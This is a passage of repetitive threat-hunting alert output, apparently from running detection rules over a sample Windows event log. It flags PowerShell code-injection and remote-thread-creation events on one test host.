Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.348 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.364 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.380 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.395 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.411 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.426 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.458 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.473 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.489 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.505 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.520 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.536 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.551 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.567 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.583 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.598 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.630 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.692 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.723 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.739 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.755 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.770 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.801 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.817 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.833 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.848 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.864 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.880 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.895 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.926 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.942 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.973 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.989 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.005 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.020 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.036 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.051 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.083 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.098 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.114 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.130 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:17.208 